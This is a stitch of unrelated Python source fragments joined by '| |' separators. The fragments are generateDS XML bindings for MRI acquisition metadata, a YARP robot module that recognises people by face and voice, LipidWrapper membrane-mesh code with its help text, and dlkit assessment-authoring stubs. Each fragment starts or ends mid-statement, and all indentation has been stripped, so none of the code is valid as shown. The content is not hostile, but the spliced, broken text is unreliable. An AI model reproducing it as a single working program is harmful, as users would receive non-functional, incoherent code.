if self.relativeReceiverNoiseBandwidth is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%srelativeReceiverNoiseBandwidth>%s</%srelativeReceiverNoiseBandwidth>%s' % (namespace_, self.gds_format_float(self.relativeReceiverNoiseBandwidth, input_name='relativeReceiverNoiseBandwidth'), namespace_, eol_))
if self.receiverChannels is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sreceiverChannels>%s</%sreceiverChannels>%s' % (namespace_, self.gds_format_integer(self.receiverChannels, input_name='receiverChannels'), namespace_, eol_))
for coilLabel_ in self.coilLabel:
coilLabel_.export(outfile, level, namespace_, name_='coilLabel', pretty_print=pretty_print)
if self.institutionName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstitutionName>%s</%sinstitutionName>%s' % (namespace_, self.gds_format_string(quote_xml(self.institutionName).encode(ExternalEncoding), input_name='institutionName'), namespace_, eol_))
if self.stationName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sstationName>%s</%sstationName>%s' % (namespace_, self.gds_format_string(quote_xml(self.stationName).encode(ExternalEncoding), input_name='stationName'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='acquisitionSystemInformationType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.systemVendor is not None:
showIndent(outfile, level)
outfile.write('systemVendor=%s,\n' % quote_python(self.systemVendor).encode(ExternalEncoding))
if self.systemModel is not None:
showIndent(outfile, level)
outfile.write('systemModel=%s,\n' % quote_python(self.systemModel).encode(ExternalEncoding))
if self.systemFieldStrength_T is not None:
showIndent(outfile, level)
outfile.write('systemFieldStrength_T=%f,\n' % self.systemFieldStrength_T)
if self.relativeReceiverNoiseBandwidth is not None:
showIndent(outfile, level)
outfile.write('relativeReceiverNoiseBandwidth=%f,\n' % self.relativeReceiverNoiseBandwidth)
if self.receiverChannels is not None:
showIndent(outfile, level)
outfile.write('receiverChannels=%d,\n' % self.receiverChannels)
showIndent(outfile, level)
outfile.write('coilLabel=[\n')
level += 1
for coilLabel_ in self.coilLabel:
showIndent(outfile, level)
outfile.write('model_.coilLabelType(\n')
coilLabel_.exportLiteral(outfile, level, name_='coilLabelType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.institutionName is not None:
showIndent(outfile, level)
outfile.write('institutionName=%s,\n' % quote_python(self.institutionName).encode(ExternalEncoding))
if self.stationName is not None:
showIndent(outfile, level)
outfile.write('stationName=%s,\n' % quote_python(self.stationName).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'systemVendor':
systemVendor_ = child_.text
systemVendor_ = self.gds_validate_string(systemVendor_, node, 'systemVendor')
self.systemVendor = systemVendor_
elif nodeName_ == 'systemModel':
systemModel_ = child_.text
systemModel_ = self.gds_validate_string(systemModel_, node, 'systemModel')
self.systemModel = systemModel_
elif nodeName_ == 'systemFieldStrength_T':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'systemFieldStrength_T')
self.systemFieldStrength_T = fval_
elif nodeName_ == 'relativeReceiverNoiseBandwidth':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'relativeReceiverNoiseBandwidth')
self.relativeReceiverNoiseBandwidth = fval_
elif nodeName_ == 'receiverChannels':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'receiverChannels')
self.receiverChannels = ival_
elif nodeName_ == 'coilLabel':
obj_ = coilLabelType.factory()
obj_.build(child_)
self.coilLabel.append(obj_)
obj_.original_tagname_ = 'coilLabel'
elif nodeName_ == 'institutionName':
institutionName_ = child_.text
institutionName_ = self.gds_validate_string(institutionName_, node, 'institutionName')
self.institutionName = institutionName_
elif nodeName_ == 'stationName':
stationName_ = child_.text
stationName_ = self.gds_validate_string(stationName_, node, 'stationName')
self.stationName = stationName_
# end class acquisitionSystemInformationType
class experimentalConditionsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, H1resonanceFrequency_Hz=None):
self.original_tagname_ = None
self.H1resonanceFrequency_Hz = H1resonanceFrequency_Hz
def factory(*args_, **kwargs_):
if experimentalConditionsType.subclass:
return experimentalConditionsType.subclass(*args_, **kwargs_)
else:
return experimentalConditionsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_H1resonanceFrequency_Hz(self): return self.H1resonanceFrequency_Hz
def set_H1resonanceFrequency_Hz(self, H1resonanceFrequency_Hz): self.H1resonanceFrequency_Hz = H1resonanceFrequency_Hz
def hasContent_(self):
if (
self.H1resonanceFrequency_Hz is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='experimentalConditionsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='experimentalConditionsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='experimentalConditionsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='experimentalConditionsType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='experimentalConditionsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.H1resonanceFrequency_Hz is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sH1resonanceFrequency_Hz>%s</%sH1resonanceFrequency_Hz>%s' % (namespace_, self.gds_format_integer(self.H1resonanceFrequency_Hz, input_name='H1resonanceFrequency_Hz'), namespace_, eol_))
def exportLiteral(self, | |
import sys
import os
import time
from torchvision import transforms
import torch, torchaudio
import yarp
import numpy as np
from speechbrain.pretrained import EncoderClassifier
from project.voiceRecognition.speaker_embeddings import EmbeddingsHandler
from project.faceRecognition.utils import format_face_coord, face_alignement, format_names_to_bottle, \
fixed_image_standardization, get_center_face
from project.AVRecognition.lit_AVperson_classifier import LitSpeakerClassifier, Backbone
from project.yarpModules.DatabaseHandler import DatabaseHandler
import scipy.io.wavfile as wavfile
import scipy
import dlib
import cv2 as cv
def info(msg):
print("[INFO] {}".format(msg))
class PersonsRecognition(yarp.RFModule):
"""
Description:
Class to recognize a person from the audio or the face
Args:
input_port : Audio from remoteInterface, raw image from iCub cameras
"""
def __init__(self):
yarp.RFModule.__init__(self)
# handle port for the RFModule
self.module_name = None
self.handle_port = None
self.process = False
# Define vars to receive audio
self.audio_in_port = None
self.eventPort = None
self.is_voice = False
# Predictions parameters
self.label_outputPort = None
self.predictions = []
self.database = None
# Speaker module parameters
self.model_audio = None
self.dataset_path = None
self.db_embeddings_audio = None
self.threshold_audio = None
self.length_input = None
self.resample_trans = None
self.speaker_emb = []
# Parameters for the audio
self.sound = None
self.audio = []
self.np_audio = None
self.nb_samples_received = 0
self.sampling_rate = None
# Define port to receive an Image
self.image_in_port = yarp.BufferedPortImageRgb()
self.face_coord_port = yarp.BufferedPortBottle()
# Port to query and update the memory (OPC)
self.opc_port = yarp.RpcClient()
# Image parameters
self.width_img = None
self.height_img = None
self.input_img_array = None
self.frame = None
self.coord_face = None
self.threshold_face = None
self.face_emb = []
# Model face recognition modele
self.modele_face = None
self.db_embeddings_face = None
self.trans = None
self.faces_img = []
self.face_coord_request = None
self.face_model_path = None
# Model for cross-modale recognition
self.model_av = None
self.sm = torch.nn.Softmax(dim=1)
self.threshold_multimodal = None
self.device = None
self.save_face = False
self.name = ""
self.predict = False
def configure(self, rf):
success = True
# handle port for the RFModule
self.handle_port = yarp.Port()
self.attach(self.handle_port)
# Define vars to receive audio
self.audio_in_port = yarp.BufferedPortSound()
self.label_outputPort = yarp.Port()
self.eventPort = yarp.BufferedPortBottle()
# Module parameters
self.module_name = rf.check("name",
yarp.Value("PersonRecognition"),
"module name (string)").asString()
self.handle_port.open('/' + self.module_name)
self.dataset_path = rf.check("dataset_path",
yarp.Value(
""),
"Root path of the embeddings database (voice & face) (string)").asString()
self.database = DatabaseHandler(self.dataset_path)
self.length_input = rf.check("length_input",
yarp.Value(1),
"length audio input in seconds (int)").asInt()
self.threshold_audio = rf.check("threshold_audio",
yarp.Value(0.32),
"threshold_audio for detection (double)").asDouble()
self.threshold_face = rf.check("threshold_face",
yarp.Value(0.55),
"threshold_face for detection (double)").asDouble()
self.face_model_path = rf.check("face_model_path",
yarp.Value(""),
"Path of the model for face embeddings (string)").asString()
# Set the device for inference for the models
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('Running on device: {}'.format(self.device))
success &= self.load_model_face()
self.sampling_rate = rf.check("fs",
yarp.Value(48000),
" Sampling rate of the incoming audio signal (int)").asInt()
success &= self.load_model_audio()
# Audio and voice events
self.audio_in_port.open('/' + self.module_name + '/audio:i')
self.eventPort.open('/' + self.module_name + '/events:i')
# Label
self.label_outputPort.open('/' + self.module_name + '/label:o')
# Image and face
self.width_img = rf.check('width', yarp.Value(320),
'Width of the input image').asInt()
self.height_img = rf.check('height', yarp.Value(244),
'Height of the input image').asInt()
self.face_coord_port.open('/' + self.module_name + '/coord:i')
self.face_coord_port.setStrict(False)
self.image_in_port.open('/' + self.module_name + '/image:i')
self.input_img_array = np.zeros((self.height_img, self.width_img, 3), dtype=np.uint8).tobytes()
self.opc_port.open('/' + self.module_name + '/OPC:rpc')
self.threshold_multimodal = 0.8
info("Initialization complete")
return success
def load_model_audio(self):
self.resample_trans = torchaudio.transforms.Resample(self.sampling_rate, 16000)
# Load Database for audio embeddings
try:
self.db_embeddings_audio = EmbeddingsHandler(os.path.join(self.dataset_path, "audio"), n_neighbors=4)
self.model_audio = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
except FileNotFoundError:
info(f"Unable to find dataset {EmbeddingsHandler(os.path.join(self.dataset_path, 'audio'))}")
return False
return True
def load_model_face(self):
try:
self.modele_face = torch.load(self.face_model_path)
self.modele_face.eval()
self.db_embeddings_face = EmbeddingsHandler(os.path.join(self.dataset_path, "face"), threshold=self.threshold_face)
# Transform for face embeddings
self.trans = transforms.Compose([
np.float32,
transforms.ToTensor(),
fixed_image_standardization,
transforms.Resize((180, 180))
])
except FileNotFoundError:
info(f"Unable to find dataset {EmbeddingsHandler(os.path.join(self.dataset_path, 'face'))} \
or model {self.face_model_path}")
return False
return True
def interruptModule(self):
print("[INFO] Stopping the module")
self.audio_in_port.interrupt()
self.label_outputPort.interrupt()
self.eventPort.interrupt()
self.handle_port.interrupt()
self.image_in_port.interrupt()
self.face_coord_port.interrupt()
return True
def close(self):
self.audio_in_port.close()
self.handle_port.close()
self.label_outputPort.close()
self.image_in_port.close()
self.eventPort.close()
self.face_coord_port.close()
return True
def respond(self, command, reply):
ok = False
# Is the command recognized
rec = False
reply.clear()
if command.get(0).asString() == "quit":
reply.addString("quitting")
return False
elif command.get(0).asString() == "start":
reply.addString("ok")
self.process = True
elif command.get(0).asString() == "predict":
self.predict = True
reply.addString("ok")
elif command.get(0).asString() == "stop":
self.process = False
reply.addString("ok")
elif command.get(0).asString() == "predict":
if command.get(1).asString() == "stop":
self.predict = False
reply.addString("ok")
elif command.get(0).asString() == "check":
if command.get(1).asString() == "tracker":
new_detection = []
new_detection.append(command.get(2).asList().get(0).asDouble())
new_detection.append(command.get(2).asList().get(1).asDouble())
new_detection.append(command.get(2).asList().get(2).asDouble())
new_detection.append(command.get(2).asList().get(3).asDouble())
name_to_assign, id_to_assign = self.check_existing_face(new_detection)
if name_to_assign:
reply.addString(name_to_assign)
reply.addString(id_to_assign)
else:
reply.addString("nack")
elif command.get(0).asString() == "save":
if command.get(1).asString() == "face":
if command.get(2).asString() == "start":
self.save_face = True
else:
name = command.get(2).asString().lower()
if name in self.db_embeddings_face.data_dict.keys():
self.db_embeddings_face.data_dict[name] = self.db_embeddings_face.data_dict[name] + self.face_emb
else:
self.db_embeddings_face.data_dict[name] = self.face_emb
self.database.save_faces(self.faces_img, self.face_emb, name)
self.save_face = False
self.faces_img = []
self.face_emb = []
reply.addString("ok")
elif command.get(0).asString() == "reset":
self.db_embeddings_face.excluded_entities = []
elif command.get(0).asString() == "set":
if command.get(1).asString() == "thr":
if command.get(2).asString() == "audio":
self.threshold_audio = command.get(3).asDouble()
self.db_embeddings_audio.threshold = self.threshold_audio
reply.addString("ok")
elif command.get(2).asString() == "face":
self.threshold_face = command.get(3).asDouble() if command.get(3).asDouble() > 0 else self.threshold_face
self.db_embeddings_face.threshold = self.threshold_face
reply.addString("ok")
else:
reply.addString("nack")
else:
reply.addString("nack")
elif command.get(0).asString() == "get":
if command.get(1).asString() == "thr":
if command.get(2).asString() == "audio":
reply.addDouble(self.threshold_audio)
elif command.get(2).asString() == "face":
reply.addDouble(self.threshold_face)
else:
reply.addString("nack")
elif command.get(1).asString() == "face":
self.face_coord_request = [command.get(2).asDouble(), command.get(3).asDouble(), command.get(4).asDouble(),
command.get(5).asDouble()]
reply.addString("ok")
else:
reply.addString("nack")
else:
reply.addString("nack")
return True
def getPeriod(self):
"""
Module refresh rate.
Returns : The period of the module in seconds.
"""
return 0.05
def record_audio(self):
self.sound = self.audio_in_port.read(False)
if self.sound and self.is_voice:
chunk = np.zeros((self.sound.getChannels(), self.sound.getSamples()), dtype=np.float32)
self.nb_samples_received += self.sound.getSamples()
for c in range(self.sound.getChannels()):
for i in range(self.sound.getSamples()):
chunk[c][i] = self.sound.get(i, c) / 32768.0
self.audio.append(chunk)
return True
return False
def read_image(self):
input_yarp_image = self.image_in_port.read(False)
if input_yarp_image:
input_yarp_image.setExternal(self.input_img_array, self.width_img, self.height_img)
self.frame = np.frombuffer(self.input_img_array, dtype=np.uint8).reshape(
(self.height_img, self.width_img, 3)).copy()
return True
return False
def check_voice(self):
if self.eventPort.getInputCount():
event_name = self.eventPort.read(False)
if event_name:
event_name = event_name.get(0).asString()
if event_name == "start_voice":
self.is_voice = True
elif event_name == "stop_voice":
self.audio = []
self.nb_samples_received = 0
self.is_voice = False
else:
pass
def get_face_coordinate(self):
if self.face_coord_port.getInputCount():
self.coord_face = self.face_coord_port.read(False)
return self.coord_face is not None
self.coord_face = None
return False
def set_name_memory(self, face_id, face_name):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("id_tracker")
cond1.addString("==")
cond1.addString(face_id)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
if list_id.size():
cmd = yarp.Bottle()
cmd.addString("get")
list_all = cmd.addList()
list_1 = list_all.addList()
list_1.addString("id")
list_1.addInt(list_id.get(0).asInt())
list_2 = list_all.addList()
list_2.addString("propSet")
list_3 = list_2.addList()
list_3.addString("verified")
reply_ver = yarp.Bottle()
self.opc_port.write(cmd, reply_ver)
print("Sent cmd to OPC {}, and received response {}".format(cmd.toString(), reply_ver.toString()))
verified = reply_ver.get(1).asList().get(0).asList().get(1).asInt()
if verified == 0:
reply2 = yarp.Bottle()
cmd = yarp.Bottle()
cmd.addString("set")
list_cmd = cmd.addList()
id_cmd = list_cmd.addList()
id_cmd.addString("id")
id_cmd.addInt(list_id.get(0).asInt())
label_cmd = list_cmd.addList()
label_cmd.addString("label_tracker")
label_cmd.addString(face_name.strip())
# cmd_str = "set ((id " + str(list_id.get(0).asInt()) + ") (label_tracker" + face_name + "))"
self.opc_port.write(cmd, reply2)
print("Sent cmd to OPC {} and received reply {}".format(cmd.toString(), reply2.toString()))
return "ack" + reply2.get(0).asString()
return False
def get_name_in_memory(self):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("verified")
cond1.addString("==")
cond1.addInt(1)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
for i in range(list_id.size()):
cmd_str = "get ((id " + str(list_id.get(i).asInt()) + ") (propSet (label_tracker)))"
cmd = yarp.Bottle(cmd_str)
reply_id = yarp.Bottle()
self.opc_port.write(cmd, reply_id)
if reply_id.size() > 0:
name = reply_id.get(1).asList().get(0).asList().get(1).asString()
self.db_embeddings_face.excluded_entities.append(name)
self.db_embeddings_audio.excluded_entities.append(name)
def get_name_to_verify(self):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("verified")
cond1.addString("==")
cond1.addInt(1)
list_condition.addString("&&")
cond2 = list_condition.addList()
cond2.addString("active")
cond2.addString("==")
cond2.addInt(0)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
name_to_verify = []
id_to_verify = []
if list_id.size() > 0:
reply_id = yarp.Bottle()
for i in range(list_id.size()):
cmd_str = "get ((id " + str(list_id.get(i).asInt()) + ") (propSet (label_tracker id_tracker)))"
cmd = yarp.Bottle(cmd_str)
self.opc_port.write(cmd, reply_id)
name = reply_id.get(1).asList().get(1).asList().get(1).asString()
id = reply_id.get(1).asList().get(0).asList().get(1).asString()
name_to_verify.append(name)
id_to_verify.append(id)
return name_to_verify, id_to_verify
return False
def updateModule(self):
current_face_emb = []
current_id_faces = []
speaker_name, audio_score = "unknown", 0
self.check_voice()
record_image = self.read_image()
record_audio = self.record_audio()
self.get_name_in_memory()
self.get_face_coordinate()
if self.process:
if record_audio and self.nb_samples_received >= self.length_input * self.sound.getFrequency():
print("Computing Speaker Embedding")
audio_signal = self.format_signal(self.audio)
# Compute speaker embeddings and do speaker prediction only if the audio database is updated with
# the same people folders as the face embedding folders (make empty folders?)
self.speaker_emb = self.get_audio_embeddings(audio_signal)
self.audio = []
self.nb_samples_received = 0
speaker_name, audio_score = self.predict_speaker(self.speaker_emb)
if record_image and self.frame.size != 0 and self.coord_face:
try:
current_id_faces, self.coord_face = format_face_coord(self.coord_face)
face_img = [face_alignement(f, self.frame) for f in self.coord_face]
current_face_emb = self.get_face_embeddings(face_img)
if self.save_face and len(current_face_emb) > 0:
self.faces_img = self.faces_img + | |
numpy array, the point (or an approximation thereof when an exact solution is not possible) where the defined lines intersect
"""
# first, define the lines from the provided points
pt1 = a1
vec1 = a2-a1
pt2 = b1
vec2 = b2-b1
# now get the points on the lines that are closest to each other
coeffs = numpy.vstack((vec2, -vec1)).T
best_sol_all = numpy.linalg.lstsq(coeffs, pt1-pt2)
best_sol = best_sol_all[0]
if best_sol_all[1][0] == 0.0: # an exact solution because the lines intersect
return vec1 * best_sol[1] + pt1
else: # return the average pt of the two points that are closest to each other
close_pt1 = vec1 * best_sol[1] + pt1
close_pt2 = vec2 * best_sol[0] + pt2
return (close_pt1 + close_pt2) * 0.5 # return the average pt
# get the corners of the new triangle
pt1 = seg_intersect( center_to_center_vec_new_length[0],second_points_on_new_side[0], center_to_center_vec_new_length[1],second_points_on_new_side[1])
pt2 = seg_intersect( center_to_center_vec_new_length[0],second_points_on_new_side[0], center_to_center_vec_new_length[2],second_points_on_new_side[2])
pt3 = seg_intersect( center_to_center_vec_new_length[2],second_points_on_new_side[2], center_to_center_vec_new_length[1],second_points_on_new_side[1])
new_pts = numpy.vstack((pt1, pt2, pt3))
return Triangle(new_pts)
def near_other_triangle(self, other_triangle, params):
"""Determines if another triangle is near this one
Arguments:
other_triangle -- A Triangle object, the other triangle to be evaluated
params -- A dictionary, the user-specified command-line parameters
Returns:
A boolean, True of the two triangles are near each other, False otherwise
"""
# check if the two triangles share a corner
dists_between_triangle_pts = cdist(self.points, other_triangle.points)
if True in (dists_between_triangle_pts == 0.0): return True # so they are adjacent
# check if the distance to their centers is too close as well
dist_between_center_points = numpy.linalg.norm(self.center() - other_triangle.center())
if dist_between_center_points < params['triangle_center_proximity_cutoff_distance']: return True
############### GET COMMANDLINE PARAMETERS ###############
def get_commandline_parameters(argv):
"""Get the user-defined command-line parameters
Returns:
A dictionary, the user-specified command-line parameters
"""
# first check if the user has requested the help file
if '--help' in [t.lower() for t in argv]:
print
print "The initial lipid model"
print "======================="
print
print textwrap.fill("--lipid_pdb_filename: This parameter specifies a PDB file containing an all-atom model of a planar lipid bilayer. LipidWrapper will wrap this lipid around the user-generated mesh. Example: --lipid_pdb_filename lipid.pdb", 70, subsequent_indent = " ")
print textwrap.fill("--lipid_headgroup_marker: A unique atom representing the headgroup of each lipid residue must be specified. The --lipid_headgroup_marker accepts a comma-separated lists of atom specifications (RESNAME_ATOMNAME). If either RESNAME or ATOMNAME is omitted, any value will be accepted. By default, LipidWrapper identifies lipid headgroups by looking for any atom named \"P\" (_P) or any atom named \"O3\" belonging to a cholesterol molecule (CHL1_O3). Example: --lipid_headgroup_marker \"_P,CHL1_O3\"", 70, subsequent_indent = " ")
print
print "Methods for creating a surface mesh"
print "==================================="
print
print textwrap.fill("--surface_equation: Generate a surface mesh from a python-formatted equation defining z, given x and y. The --min_x, --max_x, --min_y, and --max_y parameters are used to specify the region over which the function should be evaluated. The --step_x and --step_y parameters define the x-y distance between adjacent points. Python functions from the math, numpy, and scipy modules can be used. Example: --surface_equation \"z = 250*numpy.sin(x*x/60000 +y*y/60000)\"", 70, subsequent_indent = " ")
print textwrap.fill("--surface_filename: If this parameter specifies a file with the PDB extension, a surface mesh is generated from the coordinates of the PDB atoms. Example: --surface_filename mymesh.pdb", 70, subsequent_indent = " ")
print textwrap.fill("--surface_filename: If this parameter specifies a file with the DAE extension, the mesh points and triangulations will be taken from the file. Example: --surface_filename mymodel.dae", 70, subsequent_indent = " ")
print textwrap.fill("--surface_filename: If this parameter specifies a file that does not have the PDB extension, the file is assumed to be a gray-scale image, where black represents regions that are topologically low, and white represents regions that are topologically high. The --min_x, --max_x, --min_y, and --max_y parameters are used to specify the region where the mesh should be generated. The --step_x and --step_y parameters define the x-y distance between adjacent points. The --max_height parameter determines the height of the bilayer model at those locations where the image is white; black regions are assigned a height of 0. This feature is only available if the python PIL module has been installed on your system. Example: --surface_filename mymesh.png", 70, subsequent_indent = " ")
print
print "Methods for resolving lipid clashes"
print "==================================="
print
print textwrap.fill("--delete_clashing_lipids: It's common for lipids to sterically clash at the interface of two adjacent surface-mesh tessellated triangles. If this parameter is set to TRUE, any clashing lipids are deleted. Example: --delete_clashing_lipids TRUE", 70, subsequent_indent = " ")
print textwrap.fill("--clash_cutoff: If you do choose to delete clashing lipids, this parameter determines how close two atoms must be (in Angstroms) to constitute a steric clash. Example: --clash_cutoff 2.0", 70, subsequent_indent = " ")
print textwrap.fill("--clashing_potential_margin: Lipid clashes occur at the edges of adjacent tessellated triangles. If these triangles are very large, it's faster to only check for clashes and holes near the triangle edges. This variable specifies how far from the edges, in Angstroms, that LipidWrapper should look for clashes and holes. Example: --clashing_potential_margin 25.0", 70, subsequent_indent = " ")
print textwrap.fill("--fill_holes: Deleting lipids often leaves holes in the membrane. If this parameter is set to TRUE, LipidWrapper tries to fill the hole. Example: --fill_holes TRUE", 70, subsequent_indent = " ")
print textwrap.fill("--very_distant_lipids_cutoff: LipidWrapper determines if two lipids clash by comparing the distance between every atom in the first lipid with every atom in the second lipid. This can be computationally expensive. However, sometimes two lipids are so distant from each other, that it's obvious there are no clashes, making the pair-wise comparison unnecessary. Before performing this expensive pair-wise comparison, LipidWrapper calculates the distance between one atom of each lipid. If this distance is greater than this user-specified cutoff, the program will simply assume there are no clashes. WARNING: Remember to consider the width of your lipid bilayer when choosing this value. Adjacent lipids on opposite sides of the bilayer can seem distant when considering the distance between their headgroups, for example. Example: --very_distant_lipids_cutoff 50.0", 70, subsequent_indent = " ")
print textwrap.fill("--triangle_center_proximity_cutoff_distance: Lipid steric clashes/holes typically occur between lipids that belong to adjacent tessellated triangles. However, if tessellated triangles are small enough, clashes are possible between lipids that belong to non-adjacent triangles as well. Consequently, in addition to checking for adjacency, LipidWrapper also checks the distance between the triangle centers, using this user-specified value as a cutoff. Example: --triangle_center_proximity_cutoff_distance 50.0", 70, subsequent_indent = " ")
print textwrap.fill("--fill_hole_exhaustiveness: Essentially, how long LipidWrapper should try to fill the holes. Example: --fill_hole_exhaustiveness 10", 70, subsequent_indent = " ")
print textwrap.fill("--memory_optimization_factor: When the tessellated triangles are very large and consequently contain many individual lipids, the extensive pairwise distance comparisons required can result in memory errors. This parameter tells lipid Wrapper to divide the list of atoms being compared into smaller chunks. The pairwise distance comparison is performed piecewise on each chunk-chunk pair and so uses less memory, albeit at the expensive of speed. Only increase the value of this parameter if you run into memory errors. Example: --memory_optimization_factor 1", 70, subsequent_indent = " ")
print
print "Additional options"
print "=================="
print
print textwrap.fill("--number_of_processors: Using multiple processors can significantly increase the speed of the LipidWrapper algorithm. Example: --number_of_processors 8", 70, subsequent_indent = " ")
print textwrap.fill("--show_grid_points: Aside from producing PDB coordinates for lipid atoms, additional coordinates will be appended to the bottom of the output containing \"atoms\" named \"X\" that specify the location of the surface mesh points. Example: --show_grid_points TRUE", 70, subsequent_indent = " ")
print textwrap.fill("--create_triangle_tcl_file: A separate file named \"triangles.tcl\" will be generated containing a tcl script that can be run in VMD to visualize the mesh surface. Example: --create_triangle_tcl_file TRUE", 70, subsequent_indent = " ")
print textwrap.fill("--output_directory: If an output directory is specified, all LipidWrapper output files, as well as additional files representing the intermediate steps required | |
"""Manager utility implementations of assessment.authoring managers."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from ..osid import managers as osid_managers
from ..osid.osid_errors import NullArgument
from ..osid.osid_errors import Unimplemented
from ..type.objects import TypeList
from dlkit.abstract_osid.assessment_authoring import managers as abc_assessment_authoring_managers
class AssessmentAuthoringProfile(abc_assessment_authoring_managers.AssessmentAuthoringProfile, osid_managers.OsidProfile):
"""The ``AssessmentAuthoringProfile`` describes the interoperability among assessment authoring services."""
def supports_visible_federation(self):
"""Tests if federation is visible.
return: (boolean) - ``true`` if visible federation is supported
``,`` ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_lookup(self):
"""Tests if looking up assessment part is supported.
return: (boolean) - ``true`` if assessment part lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_query(self):
"""Tests if querying assessment part is supported.
return: (boolean) - ``true`` if assessment part query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_search(self):
"""Tests if searching assessment part is supported.
return: (boolean) - ``true`` if assessment part search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_admin(self):
"""Tests if an assessment part administrative service is supported.
return: (boolean) - ``true`` if assessment part administration
is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_notification(self):
"""Tests if an assessment part notification service is supported.
return: (boolean) - ``true`` if assessment part notification is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_bank(self):
"""Tests if an assessment part bank lookup service is supported.
return: (boolean) - ``true`` if an assessment part bank lookup
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_bank_assignment(self):
"""Tests if an assessment part bank service is supported.
return: (boolean) - ``true`` if assessment part bank assignment
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_smart_bank(self):
"""Tests if an assessment part bank lookup service is supported.
return: (boolean) - ``true`` if an assessment part bank service
is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_item(self):
"""Tests if an assessment part item service is supported for looking up assessment part and item mappings.
return: (boolean) - ``true`` if assessment part item service is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_item_design(self):
"""Tests if an assessment part item design session is supported.
return: (boolean) - ``true`` if an assessment part item design
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_lookup(self):
"""Tests if looking up sequence rule is supported.
return: (boolean) - ``true`` if sequence rule lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_query(self):
"""Tests if querying sequence rule is supported.
return: (boolean) - ``true`` if sequence rule query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_search(self):
"""Tests if searching sequence rule is supported.
return: (boolean) - ``true`` if sequence rule search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_admin(self):
"""Tests if a sequence rule administrative service is supported.
return: (boolean) - ``true`` if sequence rule administration is
supported, ``false`` otherwise
